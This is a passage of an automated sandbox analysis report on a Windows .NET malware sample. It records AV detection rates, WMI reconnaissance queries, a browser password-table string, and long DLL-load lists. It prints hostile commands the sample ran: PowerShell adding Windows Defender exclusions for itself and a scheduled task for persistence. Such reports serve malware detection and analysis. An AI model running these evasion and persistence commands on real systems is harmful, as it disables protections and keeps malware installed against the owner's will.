                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, Mutant created: \Sessions\1\BaseNamedObjects\VROxcSBtqecTiNgSFAqIBtbkTc
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, File created: C:\Users\user\AppData\Local\Temp\tmp3B03.tmp
                    Source: RgIbrhxoEx.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2351084802.0000000006D61000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000003030000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp, tmpD070.tmp.8.dr, tmpFAF9.tmp.8.dr, tmp53DB.tmp.14.dr, tmpD03D.tmp.8.dr, tmpD04E.tmp.8.dr, tmp2AD0.tmp.14.dr, tmp1CF9.tmp.14.dr, tmp30F2.tmp.8.dr, tmp30E1.tmp.8.dr, tmp1CC9.tmp.14.dr, tmp539B.tmp.14.dr, tmpD060.tmp.8.dr, tmp1D28.tmp.14.dr, tmp5F51.tmp.14.dr, tmpD03E.tmp.8.dr, tmp5F72.tmp.14.dr, tmp5F40.tmp.14.dr, tmpFAE9.tmp.8.dr, tmp2B00.tmp.14.dr, tmp53CB.tmp.14.dr, tmp5F61.tmp.14.dr, tmp30D1.tmp.8.dr, tmpD05F.tmp.8.dr, tmp30C0.tmp.8.dr, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: RgIbrhxoEx.exe, ReversingLabs: Detection: 83%
                    Source: RgIbrhxoEx.exe, Virustotal: Detection: 43%
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, File read: C:\Users\user\Desktop\RgIbrhxoEx.exe:Zone.Identifier
                    Source: unknown, Process created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, Process created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, Process created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe; Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe; Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe; Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe; Section loaded: secur32.dll
